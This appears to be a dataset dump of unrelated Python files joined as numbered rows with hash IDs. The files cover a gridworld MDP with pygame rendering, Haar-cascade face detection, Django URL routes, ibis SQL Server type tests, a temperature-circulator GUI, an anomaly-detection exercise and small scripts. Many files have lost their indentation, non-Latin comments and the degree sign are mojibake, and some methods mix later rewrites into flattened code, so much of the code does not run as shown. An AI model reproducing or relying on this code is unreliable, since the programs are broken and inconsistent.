        "Check if the text you want is present in a cell"
        # Exact-match search; column_name='all' scans the whole table.
        result_flag = False
        if column_name == 'all':
            table_text = self.get_all_text()
        else:
            table_text = [self.get_column_text(column_name)]
        for row in table_text:
            for col in row:
                if col == text:
                    result_flag = True
                    break
            if result_flag is True:
                break
        return result_flag
    def check_name_present(self,name):
        "Check if the supplied name is present anywhere in the table"
        return self.check_cell_text_present(name,column_name='name')
    def print_table_text(self):
        "Print out the table text neatly"
        # Header joined with '||', body rows with '|', via the write() helper.
        column_names = self.get_column_names()
        table_text = self.get_all_text()
        self.write('||'.join(column_names))
        for row in table_text:
            self.write('|'.join(row))
|
480 | 24290f3a6cf9a0a272186a505d31c62a6f278c86 | #! /usr/bin/env python
#printing the sum of the even Fibonacci numbers
n= int(raw_input("enter your number"))
sumeven=0
# Defining the Fibonacci function
def fib(n):
a,b = 0,1 #first numbers of the sequence
while 1:
yield a
a,b = b,a+b #generator for the next number in the sequence
a = fib(n)
for i in range(n):
b= a.next() #get the next number in the sequence
if b<=4000000: #check if value returned exceeds 4 million
if b % 2 == 0:
sumeven +=b #calculate the sum of even numbers
print "%d,%d"%(b,sumeven)
|
481 | 1fbd4e45b061b4d6cefb46e3bc612533ec94250b | __author__ = 'sudab'
""" Generate a grid world """
import os, sys, getopt, pdb, string
import random
import numpy as np
import pygame
from skimage import io
import cv2
import pygame.locals as pgl
class Gridworld():
# a gridworld with uneven terrain
def __init__(self, filename=None, initial=0, nrows=8, ncols=8, nagents=1, targets=[], obstacles=[], moveobstacles = [], regions=dict()):
# walls are the obstacles. The edges of the gridworld will be included into the walls.
# region is a string and can be one of: ['pavement','gravel', 'grass', 'sand']
if filename != None:
data = io.imread(filename)
data = cv2.resize(data, dsize=(16, 16), interpolation=cv2.INTER_AREA)
regionkeys = {'pavement', 'gravel', 'grass', 'sand', 'deterministic'}
(nrows,ncols) = data.shape
data = data.flatten()
obstacles = list(np.where(data==0)[0])
regions = dict.fromkeys(regionkeys, {-1})
regions['deterministic'] = range(nrows * ncols)
self.current = initial
self.nrows = nrows
self.ncols = ncols
self.obstacles = obstacles
self.regions = regions
self.nagents = nagents
self.nstates = nrows * ncols
self.nactions = 5
self.obstacles = obstacles
self.actlist = ['R','N', 'S', 'W', 'E']
self.targets = targets
self.left_edge = []
self.right_edge = []
self.top_edge = []
self.bottom_edge = []
self.regions = regions
self.moveobstacles = moveobstacles
self.states = range(nrows*ncols)
self.colorstates = set()
for x in range(self.nstates):
# note that edges are not disjoint, so we cannot use elif
if x % self.ncols == 0:
self.left_edge.append(x)
if 0 <= x < self.ncols:
self.top_edge.append(x)
if x % self.ncols == self.ncols - 1:
self.right_edge.append(x)
if (self.nrows - 1) * self.ncols <= x <= self.nstates:
self.bottom_edge.append(x)
self.edges = self.left_edge + self.top_edge + self.right_edge + self.bottom_edge
self.walls = self.edges + obstacles
self.prob = {a: np.zeros((self.nstates, self.nstates)) for a in self.actlist}
self.probOfSuccess = dict([])
self.getProbRegions()
for s in self.states:
for a in self.actlist:
self.getProbs(s, a)
def coords(self, s):
    """Return the (row, col) grid coordinate for state index s."""
    # Floor division keeps the row an int under Python 3 as well;
    # under Python 2 it is identical to the original `/` on ints.
    return (s // self.ncols, s % self.ncols)
def isAllowed(self, rowcol):
    """Return True iff the (row, col) pair lies inside the grid bounds.

    Accepts a single (row, col) tuple. Rewritten without the
    Python-2-only tuple-parameter syntax so the method also parses
    under Python 3; callers still pass one tuple, as before.
    """
    row, col = rowcol
    if col not in range(self.ncols) or row not in range(self.nrows):
        return False
    return True
def isAllowedState(self, rowcol, returnState):
    """Return the state index for (row, col) if on the grid, else returnState.

    Rewritten without the Python-2-only tuple-parameter syntax; callers
    still pass one (row, col) tuple, as before.
    """
    if self.isAllowed(rowcol):
        return self.rcoords(rowcol)
    return returnState
def getProbRegions(self):
probOfSuccess = dict([])
for ground in self.regions.keys():
for direction in ['N', 'S', 'E', 'W']:
if ground == 'pavement':
mass = random.choice(range(90, 95))
massleft = 100 - mass
oneleft = random.choice(range(1, massleft))
twoleft = massleft - oneleft
if ground == 'gravel':
mass = random.choice(range(80, 85))
massleft = 100 - mass
oneleft = random.choice(range(1, massleft))
twoleft = massleft - oneleft
if ground == 'grass':
mass = random.choice(range(85, 90))
massleft = 100 - mass
oneleft = random.choice(range(1, massleft))
twoleft = massleft - oneleft
if ground == 'sand':
mass = random.choice(range(65, 70))
massleft = 100 - mass
oneleft = random.choice(range(1, massleft))
twoleft = massleft - oneleft
if ground == 'deterministic':
mass = 100
oneleft = 0
twoleft = 0
probOfSuccess[(ground, direction)] = [float(mass) / 100, float(oneleft) / 100, float(twoleft) / 100]
self.probOfSuccess = probOfSuccess
return
def rcoords(self, coords):
s = coords[0] * self.ncols + coords[1]
return s
def getProbs(self, state, action):
    """Fill in self.prob[action][state, :], the transition distribution for
    taking `action` in `state`.

    Obstacle states are absorbing. For each move action the agent reaches
    the intended neighbour with probability p0 and slips to the two
    adjacent diagonal neighbours with p1/p2; the probabilities come from
    self.probOfSuccess keyed by the terrain region of the current state.
    'R' (rest) stays put deterministically. Off-grid neighbours collapse
    back onto `state`, so their probability mass is accumulated with +=.
    """
    successors = []
    if state in self.obstacles:
        successors = [(state, 1)]
        for (next_state, p) in successors:
            self.prob[action][state, next_state] = p
        return
    row, col = self.coords(state)
    northState = self.isAllowedState((row - 1, col), state)
    northwestState = self.isAllowedState((row - 1, col - 1), state)
    northeastState = self.isAllowedState((row - 1, col + 1), state)
    southState = self.isAllowedState((row + 1, col), state)
    southeastState = self.isAllowedState((row + 1, col + 1), state)
    southwestState = self.isAllowedState((row + 1, col - 1), state)
    westState = self.isAllowedState((row, col - 1), state)
    eastState = self.isAllowedState((row, col + 1), state)
    reg = self.getStateRegion(state)
    if action == 'N':
        [p0, p1, p2] = self.probOfSuccess[(reg, 'N')]
        successors.append((northState, p0))
        successors.append((northwestState, p1))
        successors.append((northeastState, p2))
    if action == 'S':
        [p0, p1, p2] = self.probOfSuccess[(reg, 'S')]
        successors.append((southState, p0))
        successors.append((southwestState, p1))
        successors.append((southeastState, p2))
    if action == 'W':
        [p0, p1, p2] = self.probOfSuccess[(reg, 'W')]
        successors.append((westState, p0))
        successors.append((southwestState, p1))
        successors.append((northwestState, p2))
    if action == 'E':
        # BUG FIX: the original looked up the 'W' probabilities here
        # (copy-paste error); use the east-specific entries.
        [p0, p1, p2] = self.probOfSuccess[(reg, 'E')]
        successors.append((eastState, p0))
        successors.append((southeastState, p1))
        successors.append((northeastState, p2))
    if action == 'R':
        successors.append((state, 1))
    for (next_state, p) in successors:
        self.prob[action][state, next_state] += p
def getStateRegion(self, state):
    """Return the name of the terrain region that contains `state`.

    Checks the regions in the same precedence order as before; returns
    None if the state belongs to no region.
    """
    for region_name in ('pavement', 'grass', 'gravel', 'sand', 'deterministic'):
        if state in self.regions[region_name]:
            return region_name
## Everything from here onwards is for creating the image
def render(self, size=10):
self.height = self.nrows * size + self.nrows + 1
self.width = self.ncols * size + self.ncols + 1
self.size = size
# # initialize pygame ( SDL extensions )
pygame.init()
pygame.display.set_mode((self.width, self.height))
pygame.display.set_caption('Gridworld')
self.screen = pygame.display.get_surface()
self.surface = pygame.Surface(self.screen.get_size())
self.bg = pygame.Surface(self.screen.get_size())
self.bg_rendered = False # optimize background render
self.background()
self.screen.blit(self.surface, (0, 0))
pygame.display.flip()
self.build_templates()
self.updategui = True # switch to stop updating gui if you want to collect a trace quickly
self.state2circle(self.current)
def getkeyinput(self):
events = pygame.event.get()
for event in events:
if event.type == pygame.KEYDOWN:
if event.key == pygame.K_LEFT:
return 'W'
elif event.key == pygame.K_RIGHT:
return 'E'
if event.key == pygame.K_UP:
return 'N'
elif event.key == pygame.K_DOWN:
return 'S'
elif event.key == pygame.K_SPACE:
return 'Space'
def build_templates(self):
# Note: template already in "graphics" coordinates
template = np.array([(-1, 0), (0, 0), (1, 0), (0, 1), (1, 0), (0, -1)])
template = self.size / 3 * template # scale template
v = 1.0 / np.sqrt(2)
rot90 = np.array([(0, 1), (-1, 0)])
rot45 = np.array([(v, -v), (v, v)]) # neg
#
# align the template with the first action.
t0 = np.dot(template, rot90)
t0 = np.dot(t0, rot90)
t0 = np.dot(t0, rot90)
t1 = np.dot(t0, rot45)
t2 = np.dot(t1, rot45)
t3 = np.dot(t2, rot45)
t4 = np.dot(t3, rot45)
t5 = np.dot(t4, rot45)
t6 = np.dot(t5, rot45)
t7 = np.dot(t6, rot45)
self.t = [t0, t1, t2, t3, t4, t5, t6, t7]
def indx2coord(self, s, center=False):
# the +1 indexing business is to ensure that the grid cells
# have borders of width 1px
i, j = self.coords(s)
if center:
return i * (self.size + 1) + 1 + self.size / 2, \
j * (self.size + 1) + 1 + self.size / 2
else:
return i * (self.size + 1) + 1, j * (self.size + 1) + 1
def accessible_blocks(self, s):
"""
For a give state s, generate the list of walls around it.
"""
W = []
if s in self.walls:
return W
if s - self.ncols < 0 or s - self.ncols in self.walls:
pass
else:
W.append(s - self.ncols)
if s - 1 < 0 or s - 1 in self.walls:
pass
else:
W.append(s - 1)
if s + 1 in self.walls:
pass
else:
W.append(s + 1)
if s + self.ncols in self.walls:
pass
else:
W.append(s + self.ncols)
return W
def coord2indx(self, xy):
    """Convert pixel coordinates (x, y) to the state index of the cell.

    Rewritten without the Python-2-only tuple-parameter syntax, and with
    floor division so the cell indices stay ints under Python 3 (under
    Python 2 `//` on ints is identical to the original `/`).
    """
    x, y = xy
    return self.rcoords((x // (self.size + 1), y // (self.size + 1)))
def draw_state_labels(self):
font = pygame.font.SysFont("FreeSans", 10)
for s in range(self.nstates):
x, y = self.indx2coord(s, False)
txt = font.render("%d" % s, True, (0, 0, 0))
self.surface.blit(txt, (y, x))
self.screen.blit(self.surface, (0, 0))
pygame.display.flip()
def coord2state(self, coord):
s = self.coord2indx((coord[0], coord[1]))
return s
def state2circle(self, state, bg=True, blit=True):
if bg:
self.background()
for n in range(self.nagents):
x, y = self.indx2coord(state[n], center=True)
pygame.draw.circle(self.surface, (0+(50*n), 0+(20*n), 255.0/(n+1)), (y, x), self.size / 2)
if len(self.moveobstacles) > 0:
for s in self.moveobstacles:
x, y = self.indx2coord(s, center=True)
pygame.draw.circle(self.surface, (205, 92, 0), (y, x), self.size / 2)
if blit:
self.screen.blit(self.surface, (0, 0))
pygame.display.flip()
def draw_values(self, vals):
"""
vals: a dict with state labels as the key
"""
font = pygame.font.SysFont("FreeSans", 10)
for s in range(self.nstates):
x, y = self.indx2coord(s, False)
v = vals[s]
txt = font.render("%.1f" % v, True, (0, 0, 0))
self.surface.blit(txt, (y, x))
self.screen.blit(self.surface, (0, 0))
pygame.display.flip()
#
def save(self, filename):
pygame.image.save(self.surface, filename)
def redraw(self):
self.screen.blit(self.surface, (0, 0))
pygame.display.flip()
def move_obj(self, s, bg=True, blit=True):
"""Including A moving object into the gridworld, which moves uniformly at
random in all accessible directions (including idle), without
hitting the wall or another other statitic obstacle. Input: a
gridworld gui, the current state index for the obstacle and the
number of steps.
"""
if bg:
self.background()
x, y = self.indx2coord(s, center=True)
pygame.draw.circle(self.surface, (205, 92, 0), (y, x), self.size / 2)
if blit:
self.screen.blit(self.surface, (0, 0))
pygame.display.flip()
return
def move_deter(self, next_state):
self.current = next_state
return
def background(self):
    """Render the static board onto self.bg (once) and blit it to self.surface.

    Drawing order: base white cells, per-agent target squares, obstacle
    squares (red), terrain-coloured free cells, then any highlighted
    'colorstates' cells. The rendered background is cached via
    self.bg_rendered so subsequent calls only blit.
    """
    if not self.bg_rendered:
        self.bg.fill((84, 84, 84))
        font = pygame.font.SysFont("FreeSans", 10)
        for s in range(self.nstates):
            x, y = self.indx2coord(s, False)
            coords = pygame.Rect(y, x, self.size, self.size)
            pygame.draw.rect(self.bg, ((250, 250, 250)), coords)
        for n in range(self.nagents):
            for t in self.targets[n]:
                x, y = self.indx2coord(t, center=True)
                coords = pygame.Rect(y - self.size / 2, x - self.size / 2, self.size, self.size)
                pygame.draw.rect(self.bg, (0 + (50 * n), 204.0 / (n + 1), 102.0 + (50 * n) / (n + 1)), coords)
        for s in self.obstacles:
            (x, y) = self.indx2coord(s)
            coords = pygame.Rect(y, x, self.size, self.size)
            pygame.draw.rect(self.bg, (255, 0, 0), coords)  # obstacles drawn in red
        color = {'sand': (223, 225, 179), 'gravel': (255, 255, 255), 'grass': (211, 255, 192),
                 'pavement': (192, 255, 253), 'deterministic': (255, 255, 255)}
        for s in range(self.nstates):
            if s not in self.edges and not any(s in x for x in self.targets) and s not in self.obstacles and not any(s in x for x in self.colorstates):
                (x, y) = self.indx2coord(s)
                # BUG FIX: the original built a centred Rect here and then
                # immediately overwrote it with this one; the dead
                # assignment has been removed (drawn output is unchanged).
                coords = pygame.Rect(y, x, self.size, self.size)
                pygame.draw.rect(self.bg, color[self.getStateRegion(s)], coords)
        statecols = [(0, 0, 0), (150, 150, 150)]
        # NOTE(review): __init__ initialises self.colorstates as a set, but it
        # is indexed here (colorstates[i]); this only works if a caller first
        # replaces it with a list/tuple of state collections — confirm.
        for i in range(len(self.colorstates)):
            for s in self.colorstates[i]:
                if s not in self.edges and not any(s in x for x in self.targets) and s not in self.obstacles:
                    (x, y) = self.indx2coord(s)
                    coords = pygame.Rect(y, x, self.size, self.size)
                    pygame.draw.rect(self.bg, statecols[i], coords)
        self.bg_rendered = True  # cache; don't render again unless the flag is reset
    self.surface.blit(self.bg, (0, 0))
482 | 759ff4cc123e85bdc8c1457bb521cd35841956cd | import numpy as np
import cv2
# Detect faces (and eyes within each face) with Haar cascades and show the result.
face_cascade = cv2.CascadeClassifier('haarcascade_frontalface_default.xml')
eye_cascade = cv2.CascadeClassifier('haarcascade_eye.xml')
img = cv2.imread('modi.jpg')
gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
faces = face_cascade.detectMultiScale(gray, 1.3, 5)
# Implemented the previously-missing loop: outline each detected face in
# blue, then search for eyes inside the face region and outline them green.
for (x, y, w, h) in faces:
    cv2.rectangle(img, (x, y), (x + w, y + h), (255, 0, 0), 2)
    roi_gray = gray[y:y + h, x:x + w]
    roi_color = img[y:y + h, x:x + w]
    for (ex, ey, ew, eh) in eye_cascade.detectMultiScale(roi_gray):
        cv2.rectangle(roi_color, (ex, ey), (ex + ew, ey + eh), (0, 255, 0), 2)
cv2.imshow('img', img)
cv2.waitKey(0)
cv2.destroyAllWindows()
483 | 1d524312cbd3b735850046131f31c03fdfa90bbc | my_dict = {'one': '1', 'two': '2'}
for key in my_dict:
print('{} - {}'.format(key, my_dict[key])) |
484 | add56d52f3c88f814a166d12c3bc5a5906268864 | from django.conf.urls import url
from . import views
urlpatterns = [
url(r'^class/([^/]+)/?$', views.puppet_class, name='puppet-class'),
url(r'^edit-host/(?P<fqdn>[^/]+)?/?$', views.edit_host, name='edit-host'),
url(r'^add-host/(?P<fqdn>[^/]+)?/?$', views.add_host, name='add-host'),
url(r'^delete/([^/]+)/?$', views.delete_host, name='delete-host'),
url(r'^user/(?P<loginid>[^/]+)/?$', views.edit_user, name='edit-user'),
# url(r'^add-host', views.add_host, name='add-host'),
url(r'^', views.index, name='index'),
]
|
485 | 00e9872136e5753364117adbf60793e660c8bef0 | from __future__ import annotations
import pytest
from pytest import param
import ibis
import ibis.expr.datatypes as dt
from ibis.backends.base.sql.alchemy.geospatial import geospatial_supported
DB_TYPES = [
# Exact numbers
("BIGINT", dt.int64),
("BIT", dt.boolean),
("DECIMAL", dt.Decimal(precision=18, scale=0)),
("DECIMAL(5, 2)", dt.Decimal(precision=5, scale=2)),
("INT", dt.int32),
("MONEY", dt.int64),
("NUMERIC", dt.Decimal(18, 0)),
("NUMERIC(10,5)", dt.Decimal(10, 5)),
("NUMERIC(14,3)", dt.Decimal(14, 3)),
("SMALLINT", dt.int16),
("SMALLMONEY", dt.int32),
("TINYINT", dt.int8),
# Approximate numerics
("REAL", dt.float32),
("FLOAT", dt.float64),
("FLOAT(3)", dt.float32),
("FLOAT(25)", dt.float64),
# Date and time
("DATE", dt.date),
("TIME", dt.time),
("DATETIME2", dt.timestamp(scale=7)),
("DATETIMEOFFSET", dt.timestamp(scale=7, timezone="UTC")),
("SMALLDATETIME", dt.timestamp),
("DATETIME", dt.timestamp),
# Characters strings
("CHAR", dt.string),
("TEXT", dt.string),
("VARCHAR", dt.string),
# Unicode character strings
("NCHAR", dt.string),
("NTEXT", dt.string),
("NVARCHAR", dt.string),
# Binary strings
("BINARY", dt.binary),
("VARBINARY", dt.binary),
("IMAGE", dt.binary),
# Other data types
("UNIQUEIDENTIFIER", dt.uuid),
("TIMESTAMP", dt.binary(nullable=False)),
]
skipif_no_geospatial_deps = pytest.mark.skipif(
not geospatial_supported, reason="geospatial dependencies not installed"
)
broken_sqlalchemy_autoload = pytest.mark.xfail(
reason="scale not inferred by sqlalchemy autoload"
)
@pytest.mark.parametrize(
("server_type", "expected_type"),
DB_TYPES
+ [
param("GEOMETRY", dt.geometry, marks=[skipif_no_geospatial_deps]),
param("GEOGRAPHY", dt.geography, marks=[skipif_no_geospatial_deps]),
]
+ [
param(
"DATETIME2(4)", dt.timestamp(scale=4), marks=[broken_sqlalchemy_autoload]
),
param(
"DATETIMEOFFSET(5)",
dt.timestamp(scale=5, timezone="UTC"),
marks=[broken_sqlalchemy_autoload],
),
],
ids=str,
)
def test_get_schema_from_query(con, server_type, expected_type, temp_table):
    """Create a one-column table of `server_type` and verify that both
    `_get_schema_using_query` and `table()` infer the expected ibis type.
    """
    expected_schema = ibis.schema(dict(x=expected_type))
    with con.begin() as c:
        c.exec_driver_sql(f"CREATE TABLE [{temp_table}] (x {server_type})")
    # (a duplicated re-assignment of expected_schema was removed here)
    result_schema = con._get_schema_using_query(f"SELECT * FROM [{temp_table}]")
    assert result_schema == expected_schema
    t = con.table(temp_table)
    assert t.schema() == expected_schema
|
486 | 25aa0766505b22588107d44e15c3596e9383d4e9 | import datetime
from ..core.indicator import Indicator, IndicatorState
from ..core.toolwindow import ToolWindow
class HaakePhoenix(ToolWindow):
required_devices = ['haakephoenix']
def __init__(self, *args, **kwargs):
    """Create the tool window.

    `self.indicators` maps device-variable names to their Indicator widgets;
    it is populated by init_gui(). Fixed the misspelt `**wargs` parameter
    name — forwarding behaviour is unchanged.
    """
    self.indicators = {}
    super().__init__(*args, **kwargs)
def init_gui(self, *args, **kwargs):
statusgrid = self.builder.get_object('statusgrid')
for row, column, vn, label in [(0, 0, '_status', 'Status'),
(0, 1, 'setpoint', 'Target temperature'),
(0, 2, 'temperature', 'Temperature'),
(0, 3, 'pump_power', 'Pump speed'),
(0, 4, 'control_on', 'Temperature control'),
(1, 0, 'lowlimit', 'Low limit'),
(1, 1, 'highlimit', 'High limit'),
(1, 2, 'cooling_on', 'Cooling'),
(1, 3, 'control_external', 'Control'),
(1, 4, 'diffcontrol_on', 'Differential control')]:
self.indicators[vn] = Indicator(label, '--', IndicatorState.UNKNOWN)
statusgrid.attach(self.indicators[vn], column, row, 1, 1)
errorgrid = self.builder.get_object('errorgrid')
for row, column, vn, label in [(0, 0, 'external_pt100_error', 'External Pt100'), #
(0, 1, 'internal_pt100_error', 'Internal Pt100'), #
(0, 2, 'liquid_level_low_error', 'Liquid level'), #
(0, 3, 'liquid_level_alarm_error', 'Liquid level alarm'), #
(0, 4, 'cooling_error', 'Cooling system'), #
(1, 0, 'pump_overload_error', 'Pump'), #
(1, 1, 'external_alarm_error', 'External alarm'), #
(1, 2, 'overtemperature_error', 'Overtemperature'), #
(1, 3, 'main_relay_missing_error', 'Main relay'), #
(1, 4, 'faultstatus', 'Status flags')]: #
self.indicators[vn] = Indicator(label, '--', IndicatorState.UNKNOWN)
errorgrid.attach(self.indicators[vn], column, row, 1, 1)
othergrid = self.builder.get_object('othergrid')
for row, column, vn, label in [(0, 0, 'firmwareversion', 'Firmware version'), #
(0, 1, 'date', 'Date'), #
(0, 2, 'time', 'Time'), #
(0, 3, 'autostart', 'Autostart'), #
(0, 4, 'beep', 'Beep'), #
(1, 0, 'fuzzyid', 'Fuzzy identification'), #
(1, 1, 'fuzzycontrol', 'Fuzzy control'), #
(1, 2, 'fuzzystatus', 'Fuzzy status'), #
(1, 3, 'watchdog_on', 'Watchdog'), #
(1, 4, 'watchdog_setpoint', 'Watchdog setpoint')]: #
self.indicators[vn] = Indicator(label, '--', IndicatorState.UNKNOWN)
othergrid.attach(self.indicators[vn], column, row, 1, 1)
self.update_indicators()
def on_mainwidget_map(self, window):
if super().on_mainwidget_map(window):
return True
self.update_indicators()
def update_indicators(self):
dev = self.instrument.get_device('haakephoenix')
for vn in self.indicators:
self.on_device_variable_change(dev, vn, dev.get_variable(vn))
self.builder.get_object('setpoint_adjustment').set_value(
dev.get_variable('setpoint'))
self.builder.get_object('lowlimit_adjustment').set_value(
dev.get_variable('lowlimit'))
self.builder.get_object('highlimit_adjustment').set_value(
dev.get_variable('highlimit'))
def on_device_variable_change(self, device, variablename, newvalue):
if variablename in ['_status', 'firmwareversion', 'fuzzycontrol', 'date', 'time', 'faultstatus']:
self.indicators[variablename].set_value(str(newvalue), IndicatorState.NEUTRAL)
elif variablename in ['setpoint', 'temperature', 'lowlimit', 'highlimit']:
self.indicators[variablename].set_value('%.2fยฐC' % newvalue, IndicatorState.NEUTRAL)
elif variablename in ['control_on', 'cooling_on', 'diffcontrol_on', 'watchdog_on', 'beep', 'fuzzyid',
'fuzzystatus',
'autostart']:
self.indicators[variablename].set_value(['OFF', 'ON'][int(bool(newvalue))],
[IndicatorState.ERROR, IndicatorState.OK][int(bool(newvalue))])
elif variablename in ['pump_power']:
self.indicators[variablename].set_value('%.2f %%' % newvalue,
[IndicatorState.ERROR, IndicatorState.OK][newvalue > 0])
elif variablename in ['external_pt100_error', 'internal_pt100_error', 'liquid_level_low_error', 'cooling_error',
'main_relay_missing_error']:
self.indicators[variablename].set_value(['OK', 'ERROR'][int(bool(newvalue))],
[IndicatorState.OK, IndicatorState.ERROR][int(bool(newvalue))])
elif variablename in ['liquid_level_alarm_error', 'external_alarm_error', 'overtemperature_error']:
self.indicators[variablename].set_value(['OK', 'ALARM'][int(bool(newvalue))],
[IndicatorState.OK, IndicatorState.ERROR][int(bool(newvalue))])
elif variablename in ['pump_overload_error']:
self.indicators[variablename].set_value(['OK', 'OVERLOAD'][int(bool(newvalue))],
[IndicatorState.OK, IndicatorState.ERROR][int(bool(newvalue))])
elif variablename in ['watchdog_setpoint']:
self.indicators[variablename].set_value('%.2f sec' % newvalue, IndicatorState.UNKNOWN)
elif variablename in ['control_external']:
self.indicators[variablename].set_value(['Internal', 'External'][int(bool(newvalue))],
IndicatorState.NEUTRAL)
if variablename == 'fuzzyid':
self.builder.get_object('fuzzyid_switch').set_state(bool(newvalue))
elif variablename == 'pump_power':
self.builder.get_object('circulator_switch').set_state(newvalue > 0)
return False
def on_circulator_switch_state_set(self, switch, state):
    """Start or stop the circulator pump to match the GUI switch state."""
    command = 'start' if state else 'stop'
    self.instrument.get_device('haakephoenix').execute_command(command)
    return True
def on_fuzzyid_switch_state_set(self, switch, state):
    """Push the fuzzy-identification switch state down to the device."""
    device = self.instrument.get_device('haakephoenix')
    device.set_variable('fuzzyid', state)
    return True
def on_set_setpoint(self, button):
spinbutton = self.builder.get_object('setpoint_spin')
self.instrument.get_device('haakephoenix').set_variable('setpoint', spinbutton.get_value())
def on_set_lowlimit(self, button):
spinbutton = self.builder.get_object('lowlimit_spin')
self.instrument.get_device('haakephoenix').set_variable('lowlimit', spinbutton.get_value())
def on_set_highlimit(self, button):
spinbutton = self.builder.get_object('highlimit_spin')
self.instrument.get_device('haakephoenix').set_variable('highlimit', spinbutton.get_value())
def on_update_rtc(self, button):
    """Synchronise the device's real-time clock with the host clock."""
    timestamp = datetime.datetime.now()
    # Date and time are separate device variables; set both.
    self.instrument.get_device('haakephoenix').set_variable('date', timestamp.date())
    self.instrument.get_device('haakephoenix').set_variable('time', timestamp.time())
|
487 | de6b9961e0572338c87802314e7ae3cded5168b4 | import matplotlib.pyplot as plt
import numpy as np
import scipy.io as scio
import estimateGaussian as eg
import multivariateGaussian as mvg
import visualizeFit as vf
import selectThreshold as st
plt.ion()
# np.set_printoptions(formatter={'float': '{: 0.6f}'.format})
'''Part 1: load the example dataset'''
# We start with a small 2-D dataset so the anomaly detection can be
# visualised. Each example has two features — server latency and
# throughput — and the goal is to find machines that behave anomalously.
print('Visualizing example dataset for outlier detection.')
data = scio.loadmat('ex8data1.mat')
X = data['X']  # training-set feature matrix
Xval = data['Xval']  # validation-set feature matrix
yval = data['yval'].flatten()  # validation labels: anomalous / normal
# Visualise the training set.
plt.figure()
plt.scatter(X[:, 0], X[:, 1], c='b', marker='x', s=15, linewidth=1)
plt.axis([0, 30, 0, 30])
plt.xlabel('Latency (ms)')  # feature x1: latency
plt.ylabel('Throughput (mb/s')  # feature x2; NOTE(review): label string is missing the closing ')'
input('Program paused. Press ENTER to continue')
'''Part 2: estimate the distribution of the training set'''
# Assume each feature of the dataset follows a Gaussian distribution.
print('Visualizing Gaussian fit.')
# Parameter estimation.
mu, sigma2 = eg.estimate_gaussian(X)
# Compute the probability density of the training set.
p = mvg.multivariate_gaussian(X, mu, sigma2)
# Visualise the fitted distribution as a contour plot.
vf.visualize_fit(X, mu, sigma2)
plt.xlabel('Latency (ms)')
plt.ylabel('Throughput (mb/s')  # NOTE(review): same missing ')' as above
input('Program paused. Press ENTER to continue')
'''Part 3: use the validation set to pick the best probability threshold'''
pval = mvg.multivariate_gaussian(Xval, mu, sigma2)  # densities of the validation examples under the fitted model
epsilon, f1 = st.select_threshold(yval, pval)  # choose a suitable probability threshold
print('Best epsilon found using cross-validation: {:0.4e}'.format(epsilon))
print('Best F1 on Cross Validation Set: {:0.6f}'.format(f1))
print('(you should see a value epsilon of about 8.99e-05 and F1 of about 0.875)')
# Mark the outliers found in the training set.
outliers = np.where(p < epsilon)
plt.scatter(X[outliers, 0], X[outliers, 1], marker='o', facecolors='none', edgecolors='r')
input('Program paused. Press ENTER to continue')
'''Part 4: anomaly detection on a larger, higher-dimensional dataset'''
data = scio.loadmat('ex8data2.mat')
X = data['X']  # training-set feature matrix
Xval = data['Xval']  # validation-set feature matrix
yval = data['yval'].flatten()  # validation labels: 1 = anomalous, 0 = normal
# Parameter estimation.
mu, sigma2 = eg.estimate_gaussian(X)
# Probability density of the training set.
p = mvg.multivariate_gaussian(X, mu, sigma2)
# Probability density of each validation example.
pval = mvg.multivariate_gaussian(Xval, mu, sigma2)
# Choose the best threshold.
epsilon, f1 = st.select_threshold(yval, pval)
# Report results for verification.
print('Best epsilon found using cross-validation: {:0.4e}'.format(epsilon))
print('Best F1 on Cross Validation Set: {:0.6f}'.format(f1))
print('# Outliers found: {}'.format(np.sum(np.less(p, epsilon))))  # number of anomalies in the training set
print('(you should see a value epsilon of about 1.38e-18, F1 of about 0.615, and 117 outliers)')
input('ex8 Finished. Press ENTER to exit')
488 | e37e468d8a41b8711fb0eb4ddec7db67691f9156 | '''
Created on 3 Jul 2009
@author: charanpal
An abstract base class which represents a graph generator. The graph generator
takes an existing empty graph and produces edges over it.
'''
from apgl.util.Util import Util
class AbstractGraphGenerator(object):
    """Abstract base class for graph generators: produces edges over an
    existing (empty) graph supplied by the caller."""
    def generate(self, graph):
        # Abstract method: Util.abstract() raises, forcing subclasses to
        # override with a concrete edge-generation strategy.
        Util.abstract()
489 | dc226a646af32d052c6d51832b95a340d6986e08 |
print('\n')
# ะะตัะฒัะน ะฒะฐัะธะฐะฝั
def fn1():
print("One")
def fn2():
print("Two")
def fn3():
print("Three")
fndict = {"A": fn1, "B": fn2, "C": fn3}
keynames = ["A", "B", "C"]
fndict[keynames[1]]()
fndict['C']()
# ะัะพัะพะน ะฒะฐัะธะฐะฝั
def add(one,two):
c = one+two
print(c)
print(type(c))
def sub(one,two):
c = one-two
print(c)
print(type(c))
trainee = {1:add, 2:sub}
trainee[1](10,4)
print('\n PROVERKA TIPA', type(trainee[1]))
print('\n PROVERKA TIPA', type(trainee[1](10,4)))
|
490 | a491772258a52bdfc93083343d2a2e48a240340d | # -*- coding:utf-8 -*-
# Copyright (C) 2020. Huawei Technologies Co., Ltd. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Metric of classifier task."""
from functools import partial
from vega.metrics.pytorch.metrics import MetricBase
from vega.common import ClassFactory, ClassType
import sklearn.metrics as me
def accuracy(output, target, top_k=(1,)):
    """Calculate top-k classification accuracy between output and target.

    :param output: network scores, shape (batch, num_classes)
    :type output: pytorch tensor
    :param target: ground-truth class indices, shape (batch,)
    :type target: pytorch tensor
    :param top_k: the k values to evaluate
    :type top_k: tuple of integers
    :return: accuracy tensor for each k in top_k
    :rtype: list
    """
    num_classes = output.shape[1]
    # Never request more top entries than there are classes.
    max_k = min(max(top_k), num_classes)
    batch_size = target.size(0)
    _, pred = output.topk(max_k, 1, True, True)
    pred = pred.t()
    hits = pred.eq(target.view(1, -1).expand_as(pred))
    # For each k, count hits within the first k predictions per sample.
    return [hits[:k].reshape(-1).float().sum(0) / batch_size for k in top_k]
@ClassFactory.register(ClassType.METRIC, alias='accuracy')
class Accuracy(MetricBase):
    """Running top-k classification accuracy between output and target."""
    __metric_name__ = 'accuracy'

    def __init__(self, topk=(1, 5)):
        """Initialise one accumulator per requested k."""
        self.topk = topk
        self.sum = [0.] * len(topk)
        self.data_num = 0
